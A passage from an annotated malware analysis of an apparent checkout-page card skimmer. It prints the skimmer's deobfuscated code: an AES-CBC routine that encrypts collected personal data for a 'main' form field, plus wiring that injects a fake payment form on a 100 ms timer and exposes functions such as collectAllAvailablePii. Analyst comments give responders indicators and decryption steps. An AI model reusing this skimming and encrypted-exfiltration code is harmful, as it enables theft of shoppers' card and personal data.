 * @param {number} _0x47C0 - Mode from this.modeOfOperation (OFB 0, CFB 1, CBC 2).
 * @param {number[]} _0x4829 - Key bytes; the array length is passed on as the key size.
 * @param {number[]} _0x47EA - IV bytes.
 * @returns {number[]} Ciphertext bytes.
 * @throws {string} When the IV length is not a multiple of 16.
 *
 * Analyst note: the only call in this file (at the end of encryptData_) passes mode 2, so the
 * CBC branch is the one that shapes the exfiltrated payload; the CFB and OFB branches are not used.
 */
function encrypt__(_0x4853, _0x47C0, _0x4829, _0x47EA) {
var _0x47FF = _0x4829.length;
if (_0x47EA.length % 16) {
throw 'iv length must be 128 bits.';
}
var _0x4781 = [], _0x483E = [], _0x4742 = [], _0x47AB = [], _0x4868 = [], _0x4796 = true;
if (_0x47C0 == this.modeOfOperation.CBC && this.padBytesIn(_0x4853), null !== _0x4853) {
// Process the input in 16-byte blocks.
for (var _0x47D5 = 0; _0x47D5 < Math.ceil(_0x4853.length / 16); _0x47D5++) {
var _0x4757 = 16 * _0x47D5, _0x476C = 16 * _0x47D5 + 16;
if (16 * _0x47D5 + 16 > _0x4853.length && (_0x476C = _0x4853.length), _0x4781 = this.getBlock(_0x4853, _0x4757, _0x476C, _0x47C0), _0x47C0 == this.modeOfOperation.CFB) {
// CFB: encrypt the IV (first block) or the previous ciphertext block, then XOR with the plaintext.
_0x4796 ? (_0x4742 = this.aes.encrypt(_0x47EA, _0x4829, _0x4829.length), _0x4796 = false) : _0x4742 = this.aes.encrypt(_0x483E, _0x4829, _0x4829.length);
for (var _0x487D = 0; _0x487D < 16; _0x487D++) {
_0x47AB[_0x487D] = _0x4781[_0x487D] ^ _0x4742[_0x487D];
}
for (var _0x4814 = 0; _0x4814 < _0x476C - _0x4757; _0x4814++) {
_0x4868.push(_0x47AB[_0x4814]);
}
_0x483E = _0x47AB;
} else {
if (_0x47C0 == this.modeOfOperation.OFB) {
// OFB: the keystream block is fed back instead of the ciphertext.
_0x4796 ? (_0x4742 = this.aes.encrypt(_0x47EA, _0x4829, _0x4829.length), _0x4796 = false) : _0x4742 = this.aes.encrypt(_0x483E, _0x4829, _0x4829.length);
for (_0x487D = 0; _0x487D < 16; _0x487D++) {
_0x47AB[_0x487D] = _0x4781[_0x487D] ^ _0x4742[_0x487D];
}
for (_0x4814 = 0; _0x4814 < _0x476C - _0x4757; _0x4814++) {
_0x4868.push(_0x47AB[_0x4814]);
}
_0x483E = _0x4742;
} else {
if (_0x47C0 == this.modeOfOperation.CBC) {
// CBC: XOR the plaintext block with the IV (first block) or the previous ciphertext, then encrypt.
for (_0x487D = 0; _0x487D < 16; _0x487D++) {
_0x483E[_0x487D] = _0x4781[_0x487D] ^ (_0x4796 ? _0x47EA[_0x487D] : _0x47AB[_0x487D]);
}
_0x4796 = false, _0x47AB = this.aes.encrypt(_0x483E, _0x4829, _0x4829.length);
for (_0x4814 = 0; _0x4814 < 16; _0x4814++) {
_0x4868.push(_0x47AB[_0x4814]);
}
}
}
}
}
}
return _0x4868;
}
/**
 * Decryption counterpart of encrypt__ for the same three modes.
 *
 * @param {number[]} _0x483E - Ciphertext bytes.
 * @param {number} _0x4814 - Mode from this.modeOfOperation.
 * @param {number[]} _0x47D5 - Key bytes.
 * @param {number[]} _0x47EA - IV bytes.
 * @returns {number[]} Plaintext bytes, with the padding removed for CBC.
 * @throws {string} When the IV length is not a multiple of 16.
 *
 * Analyst note: nothing in this file calls it. Its presence alongside the unused CFB/OFB
 * branches suggests the cipher was copied from a general-purpose AES library rather than
 * written for this script. NOTE(review): the function names resemble the public slowAES
 * JavaScript implementation — confirm before citing it.
 */
function decrypt__(_0x483E, _0x4814, _0x47D5, _0x47EA) {
var _0x4781 = _0x47D5.length;
if (_0x47EA.length % 16) {
throw 'iv length must be 128 bits.';
}
var _0x4829 = [], _0x4742 = [], _0x47AB = [], _0x4853 = [], _0x4796 = [], _0x47C0 = true;
if (null !== _0x483E) {
for (var _0x4757 = 0; _0x4757 < Math.ceil(_0x483E.length / 16); _0x4757++) {
var _0x476C = 16 * _0x4757, _0x4868 = 16 * _0x4757 + 16;
if (16 * _0x4757 + 16 > _0x483E.length && (_0x4868 = _0x483E.length), _0x4829 = this.getBlock(_0x483E, _0x476C, _0x4868, _0x4814), _0x4814 == this.modeOfOperation.CFB) {
for (_0x47C0 ? (_0x47AB = this.aes.encrypt(_0x47EA, _0x47D5, _0x47D5.length), _0x47C0 = false) : _0x47AB = this.aes.encrypt(_0x4742, _0x47D5, _0x47D5.length), i = 0; i < 16; i++) {
_0x4853[i] = _0x47AB[i] ^ _0x4829[i];
}
for (var _0x47FF = 0; _0x47FF < _0x4868 - _0x476C; _0x47FF++) {
_0x4796.push(_0x4853[_0x47FF]);
}
_0x4742 = _0x4829;
} else {
if (_0x4814 == this.modeOfOperation.OFB) {
for (_0x47C0 ? (_0x47AB = this.aes.encrypt(_0x47EA, _0x47D5, _0x47D5.length), _0x47C0 = false) : _0x47AB = this.aes.encrypt(_0x4742, _0x47D5, _0x47D5.length), i = 0; i < 16; i++) {
_0x4853[i] = _0x47AB[i] ^ _0x4829[i];
}
for (_0x47FF = 0; _0x47FF < _0x4868 - _0x476C; _0x47FF++) {
_0x4796.push(_0x4853[_0x47FF]);
}
_0x4742 = _0x47AB;
} else {
if (_0x4814 == this.modeOfOperation.CBC) {
// CBC: decrypt the block, then XOR with the IV (first block) or the previous ciphertext block.
for (_0x47AB = this.aes.decrypt(_0x4829, _0x47D5, _0x47D5.length), i = 0; i < 16; i++) {
_0x4853[i] = (_0x47C0 ? _0x47EA[i] : _0x4742[i]) ^ _0x47AB[i];
}
_0x47C0 = false;
for (_0x47FF = 0; _0x47FF < _0x4868 - _0x476C; _0x47FF++) {
_0x4796.push(_0x4853[_0x47FF]);
}
_0x4742 = _0x4829;
}
}
}
}
_0x4814 == this.modeOfOperation.CBC && this.unpadBytesOut(_0x4796);
}
return _0x4796;
}
// Pads the byte array in place to a multiple of 16: appends n bytes of value n, where
// n = 16 - (length % 16), so an already aligned input gains a full block of sixteen 16s.
function padBytesIn_(_0x476C) {
for (var _0x4742 = 16 - _0x476C.length % 16, _0x4757 = 0; _0x4757 < _0x4742; _0x4757++) {
_0x476C.push(_0x4742);
}
}
// Inverse of padBytesIn_: scans backwards over trailing bytes whose value is <= 16, counts how many
// equal the last byte, and splices that run off in place. Removes nothing if a differing byte is
// met before the count is reached. It is used only by decrypt__.
function unpadBytesOut_(_0x4781) {
for (var _0x4742 = 0, _0x476C = -1, _0x4757 = _0x4781.length - 1; _0x4757 >= _0x4781.length - 1 - 16 && _0x4781[_0x4757] <= 16; _0x4757--) {
if (-1 == _0x476C && (_0x476C = _0x4781[_0x4757]), _0x4781[_0x4757] != _0x476C) {
_0x4742 = 0;
break;
}
if (++_0x4742 == _0x476C) {
break;
}
}
_0x4742 > 0 && _0x4781.splice(_0x4781.length - _0x4742, _0x4742);
}
// Converts a string to bytes, two per UTF-16 code unit with the low byte first (UTF-16LE layout).
// The JSON record passes through here before encryption.
function str2EncodedArr(str) {
for (var outArr = [], i = 0; i < str.length; i++) {
var charcode = str.charCodeAt(i);
outArr.push(255 & charcode), outArr.push(charcode >> 8 & 255);
}
return outArr;
}
// Converts a byte array to a binary string and returns it base64-encoded.
// This produces the value of the 'main' form field.
function arr2String(arr) {
for (var outStr = '', i = 0; i < arr.length; i++) {
outStr += String.fromCharCode(arr[i]);
}
return btoa(outStr);
}
var existingGuid = guid, existingIv = iv, utils = {
aes: {
keySize: {
SIZE_128: 16,
SIZE_192: 24,
SIZE_256: 32
},
sbox: [99,124,119,123,242,107,111,197,48,1,103,43,254,215,171,118,202,130,201,125,250,89,71,240,173,212,162,175,156,164,114,192,183,253,147,38,54,63,247,204,52,165,229,241,113,216,49,21,4,199,35,195,24,150,5,154,7,18,128,226,235,39,178,117,9,131,44,26,27,110,90,160,82,59,214,179,41,227,47,132,83,209,0,237,32,252,177,91,106,203,190,57,74,76,88,207,208,239,170,251,67,77,51,133,69,249,2,127,80,60,159,168,81,163,64,143,146,157,56,245,188,182,218,33,16,255,243,210,205,12,19,236,95,151,68,23,196,167,126,61,100,93,25,115,96,129,79,220,34,42,144,136,70,238,184,20,222,94,11,219,224,50,58,10,73,6,36,92,194,211,172,98,145,149,228,121,231,200,55,109,141,213,78,169,108,86,244,234,101,122,174,8,186,120,37,46,28,166,180,198,232,221,116,31,75,189,139,138,112,62,181,102,72,3,246,14,97,53,87,185,134,193,29,158,225,248,152,17,105,217,142,148,155,30,135,233,206,85,40,223,140,161,137,13,191,230,66,104,65,153,45,15,176,84,187,22],
rsbox: [82,9,106,213,48,54,165,56,191,64,163,158,129,243,215,251,124,227,57,130,155,47,255,135,52,142,67,68,196,222,233,203,84,123,148,50,166,194,35,61,238,76,149,11,66,250,195,78,8,46,161,102,40,217,36,178,118,91,162,73,109,139,209,37,114,248,246,100,134,104,152,22,212,164,92,204,93,101,182,146,108,112,72,80,253,237,185,218,94,21,70,87,167,141,157,132,144,216,171,0,140,188,211,10,247,228,88,5,184,179,69,6,208,44,30,143,202,63,15,2,193,175,189,3,1,19,138,107,58,145,17,65,79,103,220,234,151,242,207,206,240,180,230,115,150,172,116,34,231,173,53,133,226,249,55,232,28,117,223,110,71,241,26,113,29,41,197,137,111,183,98,14,170,24,190,27,252,86,62,75,198,210,121,32,154,219,192,254,120,205,90,244,31,221,168,51,136,7,199,49,177,18,16,89,39,128,236,95,96,81,127,169,25,181,74,13,45,229,122,159,147,201,156,239,160,224,59,77,174,42,245,176,200,235,187,60,131,83,153,97,23,43,4,126,186,119,214,38,225,105,20,99,85,33,12,125],
rotate: rotate_,
Rcon: [141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203],
G2X: [0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38,40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74,76,78,80,82,84,86,88,90,92,94,96,98,100,102,104,106,108,110,112,114,116,118,120,122,124,126,128,130,132,134,136,138,140,142,144,146,148,150,152,154,156,158,160,162,164,166,168,170,172,174,176,178,180,182,184,186,188,190,192,194,196,198,200,202,204,206,208,210,212,214,216,218,220,222,224,226,228,230,232,234,236,238,240,242,244,246,248,250,252,254,27,25,31,29,19,17,23,21,11,9,15,13,3,1,7,5,59,57,63,61,51,49,55,53,43,41,47,45,35,33,39,37,91,89,95,93,83,81,87,85,75,73,79,77,67,65,71,69,123,121,127,125,115,113,119,117,107,105,111,109,99,97,103,101,155,153,159,157,147,145,151,149,139,137,143,141,131,129,135,133,187,185,191,189,179,177,183,181,171,169,175,173,163,161,167,165,219,217,223,221,211,209,215,213,203,201,207,205,195,193,199,197,251,249,255,253,243,241,247,245,235,233,239,237,227,225,231,229],
G3X: [0,3,6,5,12,15,10,9,24,27,30,29,20,23,18,17,48,51,54,53,60,63,58,57,40,43,46,45,36,39,34,33,96,99,102,101,108,111,106,105,120,123,126,125,116,119,114,113,80,83,86,85,92,95,90,89,72,75,78,77,68,71,66,65,192,195,198,197,204,207,202,201,216,219,222,221,212,215,210,209,240,243,246,245,252,255,250,249,232,235,238,237,228,231,226,225,160,163,166,165,172,175,170,169,184,187,190,189,180,183,178,177,144,147,150,149,156,159,154,153,136,139,142,141,132,135,130,129,155,152,157,158,151,148,145,146,131,128,133,134,143,140,137,138,171,168,173,174,167,164,161,162,179,176,181,182,191,188,185,186,251,248,253,254,247,244,241,242,227,224,229,230,239,236,233,234,203,200,205,206,199,196,193,194,211,208,213,214,223,220,217,218,91,88,93,94,87,84,81,82,67,64,69,70,79,76,73,74,107,104,109,110,103,100,97,98,115,112,117,118,127,124,121,122,59,56,61,62,55,52,49,50,35,32,37,38,47,44,41,42,11,8,13,14,7,4,1,2,19,16,21,22,31,28,25,26],
G9X: [0,9,18,27,36,45,54,63,72,65,90,83,108,101,126,119,144,153,130,139,180,189,166,175,216,209,202,195,252,245,238,231,59,50,41,32,31,22,13,4,115,122,97,104,87,94,69,76,171,162,185,176,143,134,157,148,227,234,241,248,199,206,213,220,118,127,100,109,82,91,64,73,62,55,44,37,26,19,8,1,230,239,244,253,194,203,208,217,174,167,188,181,138,131,152,145,77,68,95,86,105,96,123,114,5,12,23,30,33,40,51,58,221,212,207,198,249,240,235,226,149,156,135,142,177,184,163,170,236,229,254,247,200,193,218,211,164,173,182,191,128,137,146,155,124,117,110,103,88,81,74,67,52,61,38,47,16,25,2,11,215,222,197,204,243,250,225,232,159,150,141,132,187,178,169,160,71,78,85,92,99,106,113,120,15,6,29,20,43,34,57,48,154,147,136,129,190,183,172,165,210,219,192,201,246,255,228,237,10,3,24,17,46,39,60,53,66,75,80,89,102,111,116,125,161,168,179,186,133,140,151,158,233,224,251,242,205,196,223,214,49,56,35,42,21,28,7,14,121,112,107,98,93,84,79,70],
GBX: [0,11,22,29,44,39,58,49,88,83,78,69,116,127,98,105,176,187,166,173,156,151,138,129,232,227,254,245,196,207,210,217,123,112,109,102,87,92,65,74,35,40,53,62,15,4,25,18,203,192,221,214,231,236,241,250,147,152,133,142,191,180,169,162,246,253,224,235,218,209,204,199,174,165,184,179,130,137,148,159,70,77,80,91,106,97,124,119,30,21,8,3,50,57,36,47,141,134,155,144,161,170,183,188,213,222,195,200,249,242,239,228,61,54,43,32,17,26,7,12,101,110,115,120,73,66,95,84,247,252,225,234,219,208,205,198,175,164,185,178,131,136,149,158,71,76,81,90,107,96,125,118,31,20,9,2,51,56,37,46,140,135,154,145,160,171,182,189,212,223,194,201,248,243,238,229,60,55,42,33,16,27,6,13,100,111,114,121,72,67,94,85,1,10,23,28,45,38,59,48,89,82,79,68,117,126,99,104,177,186,167,172,157,150,139,128,233,226,255,244,197,206,211,216,122,113,108,103,86,93,64,75,34,41,52,63,14,5,24,19,202,193,220,215,230,237,240,251,146,153,132,143,190,181,168,163],
GDX: [0,13,26,23,52,57,46,35,104,101,114,127,92,81,70,75,208,221,202,199,228,233,254,243,184,181,162,175,140,129,150,155,187,182,161,172,143,130,149,152,211,222,201,196,231,234,253,240,107,102,113,124,95,82,69,72,3,14,25,20,55,58,45,32,109,96,119,122,89,84,67,78,5,8,31,18,49,60,43,38,189,176,167,170,137,132,147,158,213,216,207,194,225,236,251,246,214,219,204,193,226,239,248,245,190,179,164,169,138,135,144,157,6,11,28,17,50,63,40,37,110,99,116,121,90,87,64,77,218,215,192,205,238,227,244,249,178,191,168,165,134,139,156,145,10,7,16,29,62,51,36,41,98,111,120,117,86,91,76,65,97,108,123,118,85,88,79,66,9,4,19,30,61,48,39,42,177,188,171,166,133,136,159,146,217,212,195,206,237,224,247,250,183,186,173,160,131,142,153,148,223,210,197,200,235,230,241,252,103,106,125,112,83,94,73,68,15,2,21,24,59,54,33,44,12,1,22,27,56,53,34,47,100,105,126,115,80,93,74,71,220,209,198,203,232,229,242,255,180,185,174,163,128,141,154,151],
GEX: [0,14,28,18,56,54,36,42,112,126,108,98,72,70,84,90,224,238,252,242,216,214,196,202,144,158,140,130,168,166,180,186,219,213,199,201,227,237,255,241,171,165,183,185,147,157,143,129,59,53,39,41,3,13,31,17,75,69,87,89,115,125,111,97,173,163,177,191,149,155,137,135,221,211,193,207,229,235,249,247,77,67,81,95,117,123,105,103,61,51,33,47,5,11,25,23,118,120,106,100,78,64,82,92,6,8,26,20,62,48,34,44,150,152,138,132,174,160,178,188,230,232,250,244,222,208,194,204,65,79,93,83,121,119,101,107,49,63,45,35,9,7,21,27,161,175,189,179,153,151,133,139,209,223,205,195,233,231,245,251,154,148,134,136,162,172,190,176,234,228,246,248,210,220,206,192,122,116,102,104,66,76,94,80,10,4,22,24,50,60,46,32,236,226,240,254,212,218,200,198,156,146,128,142,164,170,184,182,12,2,16,30,52,58,40,38,124,114,96,110,68,74,88,86,55,57,43,37,15,1,19,29,71,73,91,85,127,113,99,109,215,217,203,197,239,225,243,253,167,169,187,181,159,145,131,141],
core: core_,
expandKey: expandKey_,
addRoundKey: addRoundKey_,
createRoundKey: createRoundKey_,
subBytes: subBytes_,
shiftRows: shiftRows_,
shiftRow: shiftRow_,
galois_multiplication: galois_multiplication_,
mixColumns: mixColumns_,
mixColumn: mixColumn_,
round: round_,
invRound: invRound,
main: main_,
invMain: invMain_,
numberOfRounds: numberOfRounds_,
encrypt: encrypt_,
decrypt: decrypt_
},
modeOfOperation: {
OFB: 0,
CFB: 1,
CBC: 2
},
getBlock: getBlock_,
encrypt: encrypt__,
decrypt: decrypt__,
padBytesIn: padBytesIn_,
unpadBytesOut: unpadBytesOut_
};
// Normalise the key and IV: a value that is missing or does not base64-decode to 32 bytes (key)
// or 16 bytes (IV) is replaced with random bytes; otherwise the decoded bytes are used.
// For responders holding a captured request, the visible pipeline implies this recovery order:
// base64-decode 'main', AES-CBC-decrypt it with the decoded 'uniqueId' (32-byte key, 14 rounds)
// and 'storedId' (16-byte IV), strip the padding, then read the bytes as UTF-16LE JSON.
void 0 === existingGuid ? generateGuid32() : 32 != getCodeArrFromString(existingGuid).length ? generateGuid32() : existingGuid = getCodeArrFromString(existingGuid), void 0 === existingIv ? generateIv16() : 16 != getCodeArrFromString(existingIv).length ? generateIv16() : existingIv = getCodeArrFromString(existingIv);
var _0x49B8 = str2EncodedArr(data);
// Mode 2 is CBC in utils.modeOfOperation; the result is returned base64-encoded.
return arr2String(utils.encrypt(_0x49B8, 2, existingGuid, existingIv));
}
// Publish the inner functions through the short globals declared on the script's first line
// (lscr, teros, binoms, adumn, hinnes, dertons, linomx, _gfv, hornis, derit, kilons, admis).
// collectAllAvailablePii() reaches the key, IV and encryption routines only through derit, kilons
// and admis. These global names on a checkout page are an in-page indicator of this sample.
teros = injectPaymentTable;
binoms = validateCcFields;
adumn = changeCallback;
hinnes = isValidCcNumber;
dertons = clickCallback;
linomx = collectAllAvailablePii;
_gfv = getValueFromLocalStorageOrElement;
hornis = generateGUID__;
lscr = false;
// Two pollers, each firing every 100 ms for as long as the page lives: one injects the fake
// form, the other removes it after a capture.
setInterval(startInjections, 100);
setInterval(removeInjectionIfDone, 100);
// Assigned after the timers are registered but before any timer callback can run.
derit = generateGUID_;
kilons = generateIV_;
admis = encryptData_;
};
attack(7206);
return 6052;
}());